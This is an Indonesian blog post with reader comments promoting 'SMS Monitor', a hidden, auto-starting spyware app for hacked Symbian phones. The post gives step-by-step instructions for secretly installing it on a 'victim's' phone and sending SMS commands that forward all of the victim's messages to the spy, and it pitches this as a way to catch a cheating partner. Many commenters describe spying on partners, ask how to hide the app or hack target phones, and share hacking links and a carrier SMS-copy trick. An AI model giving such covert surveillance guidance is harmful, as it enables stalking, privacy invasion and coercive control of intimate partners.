Aplikasi Penyadap Telephone SMS MONITOR

Diposting oleh Decka pada 16:52, 10-Mar-11

Di: PENYADAP TELPHONE

APLIKASI PENYADAP TELEPON SMS MONITOR

Setelah beberapa hari sibuk dengan css,meskipun sederhana karya sendiri,Ya meski banyak nyontek dari para master MWB,Akhirnya gak sempet membuat posting,kemaren ada temen yang nanyain,masih ada gak aplikasi penyadap telepon/penyadap sms,Ehh...dari pada pusing buat postingan dan mungkin masih ada yang butuh aplikasi penyadap telepon,silahkan download aja aplikasi penyadap telepon/penyadap smsnya.
*Penyadap telepon/penyadap sms yang kita pergunakan pertama adalah SMS MONITOR
*sarat utama menggunakan SMS monitor hape target atau korban harus sudah di HACK.
*Download Aplikasi Penyadap telepon SMS monitor di DISINI
*Instal aplikasi penyadap Sms monitor di hape target atau Korban.Tenang aja gan sms monitor berjalan tanpa icon(hiden icon) dan auto start.
Jika suda saatnya pengaktifan aplikasi penyadap telepon SMS monitor.
*siapkan hape penerima sms hp sang penyadap dengan mengetik SMS: Set(spasi)admin(spasi)nomor hp penerima sms sang penpenyadap(nomor kita)
Contoh: set admin 085265887xxx
Untuk mengaktifkan penyadapan:
Kirim SMS: On kirimkan ke hp korban.
Untuk mengnonaktifkan penyadapan kirim SMS: OFF kirim ke hp korban.
Ketik: add sender 085265887xxx untuk menyadap ke nomor tertentu.ketik : Add untuk menyadap semua nomor:

Berikut screensot aktifitas SMS monitor yang kita dapat.



Kita dapat menerima sms pesan masuk dan pesan keluar dari hape target atau korban penyadap.Kerenkaann.....
Silahkan coba semua resiko tanggung sendiri.....siap siap ada yang mau diputusin dari pacar nih...gara-gara ketahuan selingkuh...SMS MONITOR SOLUSI PACAR SELINGKUH.

Bagikan ke Facebook Bagikan ke Twitter

Komentar

169 tanggapan untuk "Aplikasi Penyadap Telephone SMS MONITOR"

majer pada 10:33, 12-Mar-11

bener ni aplikasi dah saya coba di e71 jalan dgn bk..

Deka pada 10:59, 12-Mar-11

Yup majer.... Tanks dah kunjung.

M. Safrie. pada 06:34, 02-Apr-11

Saya mau tanya dikit gan, yg agan suruh ketik sms: set admin 085247xxxx, itu smsnya di kirim kmana gan? Saya sdh coba n ikutin ptunjuk agan, yg bikin saya bingung itu td, sms agan suruh ktik itu d kirim kmana/nmr brpa? Mf gan klu prtanyaan saya kyk gini. Thank's gan

Deka pada 15:28, 02-Apr-11

M.safri@Set admin (nomor kamu) krm ke hp yang sudah dipasang aplikasi monitir gan.

M. Safrie. pada 00:10, 04-Apr-11

Mksih bnget gan, kini saya sdh ngerti n tak bingung lagi. Sekali lagi mksih gan.

Deka pada 02:52, 04-Apr-11

M.safri@sama2 brow...

M. Safrie. pada 17:58, 04-Apr-11

Thank's bnget gan... Trnyata sms monitor ini lbih canggih dr pd Forwarder Pro. Sdh saya coba n trnyata brjalan mulus tnpa kndala. Sms yg kita trima tk ada ngadat'y. Tk sprti Forwarder Pro yg kdng ngirim trkadang tdk. Lagian Forwarder Pro hnya sms yg msuk yg kita trima sdngkn sms kluar'y tdk. Ini yg saya cari. Mksh gan...

Deka pada 00:50, 05-Apr-11

M.safri@hp cew km yg disadap gan ya,....

visco pada 17:13, 07-Apr-11

gan aplikasinya harus dipasang di hape korban dan penyadap juga? thks

Deka pada 02:40, 08-Apr-11

[color=gold]visco@[/color]cukup di hape korban saja brow,hp penyadap cukup hp yang dapat menerima sms saja.

New thoro marghen pada 06:11, 09-Apr-11

I miss you lek.....???

Deka pada 09:26, 09-Apr-11

Luv u to lek lol

yudie pada 08:57, 11-Apr-11

udah ane download eh trnyata,ma f-secure d anggap trojan,apes langsung di apus deh,ada yg lain gak?

Bokae@ pada 09:05, 14-Apr-11

mas...mw tax nih,msh g' ngerti cra makaix....klw udh ktik set admin (no.hp),i2 d krim kmana,k no. Sndri at no.korban...? Trz bs g' nyadap hp yg blm makai sms monitor...? Thanks before.

Deka pada 16:12, 14-Apr-11

Yudi@ada gan sms proweder

Bakoe@set admin (no km) krm ke hp korban yg udah dipaasann sms monitor.

Anchu pada 06:12, 15-Apr-11

Wow kren abis,,,,gw bs jd jamess bond lokal,,he,he,he,,,,thankz brw...

Yoyo pada 15:36, 15-Apr-11

Suwon Mz Bro....

Deka pada 18:23, 15-Apr-11

[color=gold]anchu[/color]@yup brooww

[color=gold]yoyo[/color]@sami sami masbrow...

Eza dsni pada 18:20, 18-Apr-11

gan... Tmen q da nyadap hp q nihh kyax... Gmna cara supa hp q g d sadap lg...???

Deka pada 19:41, 18-Apr-11

Eza@hp km ap?koq tw klw hpnya dsadap?

Yg bs disadap dng sms monitor hanya hp symbian yg sudah dihack.

andyka pada 13:05, 20-Apr-11

aq px yg lebih mantap gan??? bsa nampilin tlfn,sms yg terhapus n smua percakapan.. jd pasangan mati kutu.hwehehe...

Deka pada 15:41, 20-Apr-11

Andyka@bagus lw gtu.

andyka pada 16:20, 20-Apr-11

iya gan,,tp mf z g bsa share..
btw,cara hack 5233 gmn za?? q pke hellox g mw.. kta tmen2 hp new sulit di hack

Deka pada 18:06, 20-Apr-11

Andyka@belum tau saya gan.... Q jg baru belajar koq

andyka pada 18:33, 20-Apr-11

ohw...gt
ya dah.. gpp
terus belajar z gan biar mantap.. n siap ne tggu apps yg unik2.

M. Safrie. pada 14:29, 24-Apr-11

Ass....., gan..?!
Saya mo nanya, ada gx gan aplikasi yg bisa bikin suara kita berubah saat nlpon..??? Klu ada aplikasi'y, kasi thu y gan..?! Thank's bwt agan.

Deka pada 07:08, 25-Apr-11

M.safri@ada gan tp kusus s60v5.cari di gugel kt kunci aplikasi merubah suara wanita saat telepon.ku dah tes di e71 gak jalan.krn memang bwt sejenis c6. Klw gk salah di adit38.wordpres.com

M. Safrie. pada 23:40, 28-Apr-11

Thank's y gan atas info'y...
Mudah2an aja kpn2 ada bwt nokia e63.

cah kampoeng pada 14:28, 29-Apr-11

aplikasiny saya coba pasang d hp,lah cara memunculkan icon ny gmn?trims

penguasa pada 06:08, 12-Mei-11

bisa dipasang di 5800XM ngaa gan?

siz pada 06:39, 17-Mei-11

thank's gan,ne apps sangat membatu......

Ada ngak gan,sms monitor buat bb???.

siz pada 06:40, 17-Mei-11

thank's gan,ne apps sangat membantu......

Ada ngak gan,sms monitor buat bb???.

Bonk pada 09:41, 18-Mei-11

Mantabh nie gan , cuma ane agak bingung ama maksud dari kata2 ente di atas gan, hehe . . .

Ketik: add sender 085265887xxx untuk menyadap nomor tertentu. ketik: add untuk menyadap semua nomor

Nah ntu maksudna gemana brader ??

Bonk pada 09:42, 18-Mei-11

Mantabh nie gan , cuma ane agak bingung ama maksud dari kata2 ente di atas gan, hehe . . .

Ketik: add sender 085265887xxx untuk menyadap nomor tertentu. ketik: add untuk menyadap semua nomor

Nah ntu maksudna gemana brader ??

Irpank pada 19:54, 29-Mei-11

wah seru ne, boz hp apa aja yg bs d sadap.

ilmanlemutz pada 14:33, 13-Jun-11

bos kalo buat nokia n70 da ga sms monitor'y,,,klw da link download'y kirim y via email ilman_kamaludin@yahoo.com

gentayangan.com pada 06:09, 18-Jun-11

thx agan decka,cukcess bnget ne software,btw ad ga app yg bisa menyadap call masuk n kluar dan kita bisa denger pcakapn lngsung dari hp penyadap.tq

Anton pada 13:16, 29-Jun-11

Hp korban 3233 hack pakek apa gan

Deka pada 17:00, 29-Jun-11

Gunakan hackit aja gan.

arga pada 13:14, 20-Jul-11

gan sent item hp korban saat kirim ke hp penyadap kog hilang ya ga da sma sekali...apa memang gt..wah bs curiga

ardiandra pada 14:15, 21-Jul-11

mas deka, kl buat d ngage classic bs ga ya// trs cr hack n instal aplikasinya gmn ya ms, tlng bantuannya

Riani pada 02:32, 06-Agu-11

Hi kak, ku mo nanya ney,,, low apps ubah suara jadi teks ada gak ya,,, ku minta donk.

belly pada 14:00, 07-Agu-11

aplikasinya2 sgat bgus2,,
n? Mas,,kan apliksi it uda terinstal n uda bsa nydap smsnya,,nah bgmna cra menghentikan penyadapan itu mas,olhya sdh sya cbo ketik of trs sya krim ke hp korban,tpi g brnti mas,msh ttap aja jalan penyadapn smsnya,,
tlong infony y mas,
mksh

ola pada 11:26, 09-Agu-11

buat nokia 3120C bisa ndak ya

sandy pada 13:06, 14-Agu-11

udah d instal,udah kirim sms set admin no q k target,udah ketik on kirim k target,tp kok blum bisa gan,gmn cranya?

adi ongox pada 01:39, 02-Sep-11

bos ane sih pengen aplikasi yg buat kirim sms tanpa nomer ada ga ya.... S60v3

Joev pada 02:51, 05-Sep-11

Ud Siep app ,, ^^
pii klo Buad Hp v2 ato BB ad g ea Mas Bro ,, ??

askar pada 13:38, 08-Sep-11

gimana cara installnya?\

edy san pada 04:45, 10-Sep-11

kalo hape n70 bisa kagak ya??

Roy pada 18:49, 11-Sep-11

Kagak bisa di instal gmna cranya ??

robbie_caem@yahoo.com pada 18:13, 13-Sep-11

gan kalo dipasang di hape blackberry bisa kagak ?

bibul pada 09:50, 17-Sep-11

bos sya mw tnya.klu hp pacr saya hp cina sedangkan saya hp e63 bisa gak saya penyadap hp pacr saya...???

ryxzen pada 10:31, 08-Okt-11

ada app logger gak sih gan di hp? Hp saya 5320

kidoy.tauruz@yahoo.com pada 16:53, 09-Okt-11

cara ngehack hp'y gmn gan??apa yg hp yg mau di instal aplikasi sms monitor hrs symbian atw gmn???misal s penerima beda fitur hp gmn???

cahyo pada 15:45, 13-Okt-11

mas deka.......tq ea wat appx ?? W coba dulu.... Tq mas

Hendi Kurniawan pada 07:01, 15-Okt-11

mantab sob, udah aku test... Aku share ulang ya di blog ku..

temon pada 06:25, 17-Okt-11

ko diinstal di N73 tulisannya sertifikat kadarluasa, mohon pencerahan gan?

Ade Kecil pada 20:53, 22-Okt-11

dah bsa d instal d hp n73 ane, bsa jalan seh..cma stlah beberbpa sms langsung ga bsa lg, hp nya msti d restart bru bsa lg, stlah beberapa smz kmbuh lg, knpa tuh gan?

rere pada 16:22, 28-Okt-11

kalo korban ganti nomor gimana.? Masih jalan g tuh sms monitornya?

ivan pada 03:02, 02-Nov-11

bingung

Uchlim pada 01:40, 08-Nov-11

Yg mengecewakan mesti di pasang di hape korban apalagi kalaw hape di matikan aplikasi jadi of

naf pada 03:03, 12-Nov-11

kok g bs d instal gan??? sertifikat kadaluarsa. hp sy nokia 5233

Chris pada 06:28, 16-Nov-11

gan buat bb bs ga gan?? biggrin

michael pada 23:55, 16-Nov-11

gan gmna kalo hp krban lum d heck..? Bs g qt sadap...?

boxir pada 15:41, 21-Nov-11

Gan, buat hp Android bisa kaga..???

M. Safrie pada 07:50, 27-Nov-11

Met sore gan?! Safrie dtng lg d blog'y agan. Kali ini saya sdikit mo tanya gan. Dulu hp saya ini nokia e63 klu d matikn lalu d hdupkn lg hnya 1 kali sj saya mngatur tgl n jam'y. N klu d matikn n d hdupkn lgi tdk prlu mngatur jam n tgl'y. Tp skrng stiap d matikn n d hdupkn psti hrus mngatur tgl n jam'y. Bgaimna solusi'y supaya kmbali kyk dulu hnya skali sj ngatur jam n tgl nya. Mksh sblum'y gan, n smoga blog'y agan mkin jaya. Amiiiiin,,,,

ariez pada 13:46, 30-Nov-11

@safri = klo gtu coba buka setting date nya brai... pilih aja auto up-date tgl nya..

risz pada 22:25, 02-Des-11

gan kalau sms monitoring buat hp cina ada ga gan??
Kalau ada mohon infonya??

risz pada 22:26, 02-Des-11

s

risz pada 22:27, 02-Des-11

gan kalau sms monitoring buat hp cina ada ga gan??
Kalau ada mohon infonya??

agus pada 10:02, 05-Des-11

gan ko korban krm sms ke no admin laporan kiriman dan trkrmny ga ad?

agus pada 00:13, 06-Des-11

gan ko hp korban mati trus nyala, aplikasiny ga jalan y? Alias hrz d instal ulang smile

oche pada 16:15, 10-Des-11

mantap tutornya

Aly Aljufri pada 20:02, 14-Des-11

mantap gan ijin nyontek

Gufron pada 15:47, 16-Des-11

di nok 3650,bsa ga bos?cara hacknya gmana???

yandi pada 08:11, 18-Des-11

gan buat 6120 classic bisa g??thnx before

adira pada 02:14, 19-Des-11

trs itu. ambil pulsa si target gak? atau jgn2 plz kita yg ke ambil??

ferry pada 09:01, 19-Des-11

gan,ntu pake font pa boleh tw ga

Saef92 pada 11:14, 25-Des-11

nyimak ajah sob. . .
Thank.s

iwan pada 19:16, 26-Des-11

masih ya bos aku udah putusan m cwe aku
No hp bos brapa sih biar aku isi kan pulza
Serius lo

Gamal Astro pada 13:59, 27-Des-11

Keren kang... Patut dicoba'...

Dadanz pada 02:30, 31-Des-11

kren gan lam kenal di tunggu kunbalnya

rudy amr pada 22:53, 02-Jan-12

hacked cara ter baru 2jan2012 ,untuk 5233 s60v5 fw40.1.003 langsung kunjungi yg punya aplikasinya - http://m.global.heck.in/hack-symbian-terbaru-by-coderus.xhtml

rudy amr pada 22:54, 02-Jan-12

hacked cara ter baru 2jan2012 ,untuk 5233 s60v5 fw40.1.003 langsung kunjungi yg punya aplikasinya - http://m.global.heck.in/hack-symbian-terbaru-by-coderus.xhtml

Jo'ank pada 11:33, 03-Jan-12

koq file donlotanya kosong boss???aplikasinya gak ada...harap diperbaiki,,,makasihhh...

ridho pada 18:04, 12-Jan-12

gan gw bngun ni,,cra pakainy di e63,,
bngun brow...

hendysahara69 pada 20:51, 12-Jan-12

knapa yach setiap mau di instal aplikasinya selalu jawabannya*sertifikat kedaluarsa/hubungi penyalur* itu gmana mas bro

obet pada 13:09, 21-Jan-12

ini yg agak repot krn kt hrs instal lg ke hp korban, bisa curiga dong korbannya kl hpnya diutak-atik.

Jangka Panjang pada 08:22, 30-Jan-12

Mantap Gan Apps msh berjaln normal untuk versi java ada ga

soni pada 08:53, 30-Jan-12

kalau buat nokia c2-03 ada gk aplikasi penyadap smsX?

Jepon pada 15:16, 05-Peb-12

keren sob..tp syg nya g pnya korban..T..T

Fitri R pada 15:47, 07-Peb-12

mau nanya niih bisa di aplikasiin ke Nokia C2-03 apa nggak yaaa kalo bisa gimana nih caranya pencerahannya dong penting banget niiih
terima kasih banyak sebelumnya
fitri R

Yg kmren mnt hack x6 pada 18:10, 09-Peb-12

Klo yg jar ada gx mz deka? Monitor bwt samsung champ

sem pada 15:44, 27-Peb-12

haduh,, kalo hp korban terpasang i-sms ternyata perintah yg kita kirim(admin) bisa terbaca di hp korban masta.

obet pada 10:45, 29-Peb-12

jeleknya krnkita hrs instal ke hp korban, gmn kl orgnya yg mau disadap jauh????

RD'81 pada 03:58, 12-Mar-12

@obet: ya lo beliin hp yang sudah terinstal software ini aja.. hihihihi..

btw yg punya blog mana neh ya... ane mo sundul prtanyaan'a agan> naf [03:33 AM, 12-Nov-11]

kok g bs d instal gan??? sertifikat kadaluarsa. hp sy nokia 5233

Herdi Firdaus pada 09:12, 12-Mar-12

korbannya hp cina,truz gmna cara hack x gan...??Truz laen symbian aghe....

DIo pada 11:29, 14-Mar-12

nokia C3-00 bisa ga gan

belalai pada 15:27, 20-Mar-12

adminnya sibuk tuhh..
Bwt yng pada bingung tnya aja pman gugell

ucha pada 10:44, 23-Mar-12

Maaf gan, aplikasi penyadap teleponnya ga bisa d install d hp ane, hp ane E63.
Kalo bisa sih minta no agan biar ane bisa tanya langsung ke agan. Makasih dtunggu jawabannya smile

erik pada 17:03, 23-Mar-12

bwt c5 bgus gak

Cupank pada 21:40, 24-Mar-12

Gan punya q N73,pi q coba kok gak bisa ya.soalNya besok kan mau tukeran ma bini.maaf y gan ganggu..

cupank pada 21:47, 24-Mar-12

Maaf gan ganggu,punya q kan N73,pi kok gak bisa di instal y,butuh sertifikat to sertifikat gak co"k gt y.tolong dong gan soalNya besok mau tukeran hp ma bini ne.

deris pada 09:27, 27-Mar-12

doi pke hp java min kgak bsa d"install, gmna tuh min??

hayu pada 11:37, 27-Mar-12

boss,,,. apa bisa sadap hp cina?

Rony pada 09:43, 12-Apr-12

Teman teman gue blg yg paling bagus software dari penyadap.com bs sadap suara percakapan, sms, blackberry messenger,suara di sekitar HP yg aktif dll. Apakah ada org di sini sdh nyoba?

Moejiek pada 17:55, 13-Apr-12

Gmna carax gan klo mau nyadap ke semua nomor & nomor tertentu...ente cma bilang KETIK: ADD SENDER 08524754XXX untk nyadap no tertentu & KETIK: ADD untuk kesemua nomor......

E63 gwa jdi canggih nih....mp3 nya bsa karaoke n bsa nonton TV/dnger radio dri bnyak negara.....BBM jga ada & msh bnyk lagi biggrin

Moejiek pada 18:02, 13-Apr-12

Kalo app nya kadaluarsa n g bsa di instal/hack......coba rubah tanggal/bln/tahun di hp mu & ikutin tgl/bln/thn pembuatan app nya...good luck

Moejiek pada 18:20, 13-Apr-12

Sekedar info: sebenernya TELKOMSEL ada juga lo cara mnyadap sms tnpa hrs ribet2 hack hp & untk smua jenis hp & yg penting memakai kartu TELKOMSEL & bsa mnyadap no operator mna aja,,,namanya sms copy...ketik: Menu kirim ke 2255 & pilih no 4:Copy & ikuti petunjuknya......tpi hanya sms yg masuk aja yg bsa disadap & biaya sms ditanggung korban yg disadap...misalx biaya sms normal cma Rp.115/sms ,,stelh disadap jdi Rp.150/sms....met mncoba guys biggrin
Perhatian: baca baik2 petunjuknya,,,,jika kamu salah masukin no hp antara no hp mu & no hp sidia...bisa2 no mu yg kena sadap....hati2 ya biggrin

Moejiek pada 18:32, 13-Apr-12

Hari gini masih pke Hp cina & java....waaaaakkkkkkkkkkkkkk

BlackBerry apa hebatnya.......program aja java....waaaakkkkkkkkkkk
Buat gwa hp yg hebat tuh hp yg bsa buat maen game online sama bnyak orng dri smua negara....cuma NOKIA SYMBIAN YG BISA.....yg lain mah NOTHING.....WAAAAKKKKKKKKKK

FaYJHO pada 07:55, 17-Apr-12

Cara uninstalnya gmn ya?

Dillah pada 05:27, 20-Apr-12

Cara merubah nomor admin (nmr penyadap) gimana, bos?
Kan misal: Set admin 081933799677, trus mau dirubah ke 085751028888 gimana caranya?

lucky pada 12:40, 21-Apr-12

mas deca klo buat x5 bsa gk?

tony pada 01:13, 22-Apr-12

ngomong2 pakai plsa gak,?,hee ya pasti kan
.maksut g mahal gak gan,?

tony pada 09:10, 22-Apr-12

lucky x5 bisa,,g da coba

tony pada 09:14, 22-Apr-12

lucky x5 bisa,,g da coba

sinyo pada 17:02, 22-Apr-12

thanks Gan... Semua aplikasix yg ada di blockx agan uda aen sedot semua gan.. Berjalan Mulus semuLus Agnes Monic gan. Tengkiyu gan,,, salam Kenal Dr Wong jEMBER gAN.

CrazyBoyz pada 08:12, 23-Apr-12

Ni buat hp apa aja gan...?

danny pada 07:00, 25-Apr-12

gan merek hp apa aja yg bisa

Doeda pada 07:13, 25-Apr-12

<font color="#FF1493">siang agan agan</font><font color="#0000ff">mw tanya nih..barangkali ada yg tau sms monitor atau sejenisnya dalam format jar... </font>terima kasihsmile

Doeda pada 07:19, 25-Apr-12

[font color="#FF1493"]siang agan agan[/font][font color="#0000ff"]mw tanya nih..barangkali ada yg tau sms monitor atau sejenisnya dalam format jar... [/font]terima kasihsmile

Doeda pada 07:19, 25-Apr-12

[font color="#FF1493"]siang agan agan[/font][font color="#0000ff"]mw tanya nih..barangkali ada yg tau sms monitor atau sejenisnya dalam format jar... [/font]terima kasihsmile

Doeda pada 07:23, 25-Apr-12

{bbcode} ...np gk html ato css ajbiggrin

anonym pada 07:25, 25-Apr-12

[color=blue]test[/color]

jablay pada 07:33, 25-Apr-12

[url=http://www.facebook.com/herdiana.mbah.doeda]maaf![/url]

Chevy pada 00:56, 28-Apr-12

misi Gan, kukira postingan ni sdh mnghilang trnyta msih ada, q update ulang d blogku, tp ku juga sertakan blog Agan, silahkan d cek sndiri gan d http://chevynuril.heck.in/
Trims

Fatan Nur Jai Lugito pada 09:29, 02-Mei-12

mantabz gan,trimakasih banyak..

Yoga pada 01:12, 05-Mei-12

mantap banget mas,,sukses sllu n smngat.salam yoga

raple pada 03:31, 06-Mei-12

gan,kalau mau gnti admin(no penyadap) bisa egk ??cara nyagan ...mksh gan,moga sukses sllu

Kharisma pada 01:44, 14-Mei-12

blogwalkink gan....
gmana gan uda pnya baby pa lom..?
Izin share ulang apps y di blog q gan.....
Sukses selalu....

crOosS pada 12:03, 17-Mei-12

bisa gak brO,seandai nya hp target/korban belum di hack..??? Hohohohohooho..

AFF pada 13:05, 30-Mei-12

Ni softwrae sukses gak GAN?

Ahmad Hidayat pada 18:58, 04-Jun-12

Ada gk buat java sob???

Kunjungn balik sob,, mksih

nawra pada 23:11, 18-Jun-12

saya mau tanya... mengapa tiba-tiba tidak dapat menyadap lagi??
mohon penjelasan...
ketika tidak dapat menyadap, saya hapus aplikasi sms monitor dari app.manager..
kemudian saya instal ulang...
hp juga sudah di restart
namun tetap tidak bisa...
mohon pencerahan

Spymee pada 01:43, 23-Jun-12

kalo untuk n70 bisa gak nih aplikasi ?

Ricco pada 12:02, 04-Jul-12

Gan Kalo Buat Blacberry bisa gx ??

Ricco pada 18:34, 05-Jul-12

Gan Kalo Untuk Menghapus SMS monitor gmn ne gan... saya menyadap hp pasangan saya,, ternyata pasangan saya menyadap hp saya juga,,hehe,,jdi sms yg msuk sertubi tubi gan,, jadi pemborosan pulsa gan,,hehe

Ricco pada 00:07, 06-Jul-12

Gan Kalo Untuk Menghapus SMS monitor gmn ne gan... saya menyadap hp pasangan saya,, ternyata pasangan saya menyadap hp saya juga,,hehe,,jdi sms yg msuk sertubi tubi gan,, jadi pemborosan pulsa gan,,hehe

Ato putra pada 16:58, 17-Jul-12

Gmn carany klo nokia c3

Iyan pada 07:02, 21-Jul-12

Law bwt sadap javat bsatgk?

Ato putra pada 16:49, 21-Jul-12

<fg=fbf00000>Gan klo nokia c3 bs gak donwlod aplikasi symbian ,tolong bantu aq،aq ada masala?..........kasih tw donk?.....

joyko pada 06:06, 02-Agu-12

nokia c3 bisa diaplikasi penyadap telepon sms gak ya...?

Dila pada 17:23, 12-Agu-12

Gan tolong bantu, kan ane udah set admin pertama itu lancar gan, udah 1 hari selanjutnya ketik set admin lagi, malah sms jadi spam ke korban gan, tolong bantuin, kasian korbannya

Dila pada 01:48, 13-Agu-12

Gan kalau mau gak tak aktifin gimana sih? saya ketik : OFF (dikirim ke nomer korban udah) tapi tetep aja kotak masuk di saya menyadapnya

Hady Fky pada 11:18, 27-Agu-12

ohh jd kita harus pegang hp korban dlu ya ga,,trus kita pasang aplikasi ,,trus kita set seperti di atas ya gan,,mantapp

ridho wonk cherbond pada 22:06, 28-Agu-12

mas deka kalo hp c korban lom d hack apa bisa,msalah'a hp cwe ane java...
Tolong pencerahan'a..

akhew pada 17:41, 04-Sep-12

klo tnpa d hack hp target'y gmn???bsa g????

Harris pada 13:38, 15-Sep-12

met malam gan ... ane mu tanya.kan ente cma bilang KETIK:
ADD SENDER 08524754XXX untk
nyadap no tertentu & KETIK: ADD
untuk kesemua nomor......,mksudnya gmna,mhon bntuan nya, thank sob

eQokk Als Paunathans pada 06:47, 22-Sep-12

keren sob. .ada buat javanya gak ya?

eQokk Als Paunathans pada 06:48, 22-Sep-12

keren sob. .ada buat javanya gak ya?

cahyo pada 03:43, 04-Okt-12

pas mo install koq muncul sertifikat kadaluarsa trus muncul lg "tidak dapat install karena penyuplai tidak di percaya"....gmn tu y?

cahyo pada 03:44, 04-Okt-12

HP yg dpake Nokia 5630 Xpressmusic...HELP!!!

si yoyo pada 06:30, 04-Okt-12

bisa sadap bb ndak?

Iman Nur Toffa pada 23:02, 10-Okt-12

riques donk sob untuk nokia e63 ,,
.al'nya app yg di atas ndc bisa di instal,,,

by: anak siak

tetetuwet pada 09:32, 08-Nov-12

Mampir Gan... Lama ne liat blog Kog belum ada yg baru

mey pada 07:14, 23-Des-12

gan mw tanya ni...aq kan uda install tuh app sms monitornya,,nah tp uda d cba d smsin tp msh blom jlan,apa hrus ketik on dlu gan,apa gmn?terus cara ngilangin d manager file gmn yaa?soalnya tkt ketauan dstu..
Oya,,yg d aktfn sms monitornya d hp korban kan? Tlng ksh tau yaa,,,mksh

putra cherbon pada 12:07, 19-Jan-13

Mantap gan infonya,aku copas

Reza Rabbani pada 18:51, 19-Jan-13

thanks gan. Trus berkarya.

rizky pada 04:24, 13-Peb-13

sob, mo tanya nih. gw dah install app sms monitor dan berhasil, semua sms masuk dan terkirim di hp korban masuk ke hp gw.
tp sekarang gw gak nerima pesan masuk dan terkirim dari hp korabn, emang aplikasinya ada batas pemakaian atau apa gitu yah?
gak tau berapa lama udah gw pasang n dah banyak pesan2 dr hp korban masuk ke hp gw.

mohon penjelasannya sob kalau berkenan sms gw, ntar gw kasih sesuatu sebagai tanda terima kasih.

berhubung gw jarang buka mwb coz nyubi, mohon bantuannya via fb biar lebih mudah.
nih fb gw
http://www.facebook.com/Ada.Rizky

Randy pada 23:22, 28-Mar-13

kwan...

App sms monitor tu bs d instal d nokia tipe apa ja...???

Apa bs d instal d smua symbian...???

Mhon jwabanx...

eqoflash pada 11:44, 03-Apr-13

gan gmana supaya sms m0nitor bisa nyadap sms tnpa batas gk cuma 5 pesan aja,..help me.

DAN pada 14:15, 06-Mei-13

sob saya mau sadap hp dia tp dianya jauh (LDR), saya taunya cuman nomor hpnya dia (AS), bisa ga nyadap sms dr nomor itu? please cariin dong? thx..

dx pada 17:42, 19-Mei-13

Hp china bisa ga?

muthohar pada 23:46, 22-Mei-13

Trus ngirim.a kmana? (set admin .xxx)

jimmy pada 06:42, 29-Mei-13

mana mungkin kita instal dlu ke hp korban jk hrs di hack dlu itu hp nya....app dudul

Ichal Bcs pada 00:42, 01-Jun-13

biaya sms siapa yg tanggung sob? Lw cewe kt yg nanggung wah dia curiga pulsanya brkurang.

nurianEseries pada 13:34, 03-Jun-13

kunjungan pertama gan...
keren tuh aplikasinya, ku tunggu kunbalnya ya, n ollow back ya... smile

edy pada 16:39, 09-Nov-13

gan bs di gunakan dlm Blackbery ga

Arpusjj pada 08:49, 30-Apr-14

Gan sms monitorny gk bisa di instal , crny gmn gan.padahal Hpku udah di hack ni. Thengkiu

Langganan komentar: [RSS] [Atom]

Komentar Baru

[Masuk]
Nama:

Komentar:
(Beberapa Tag BBCode diperbolehkan)

Kode Keamanan:
Aktifkan Gambar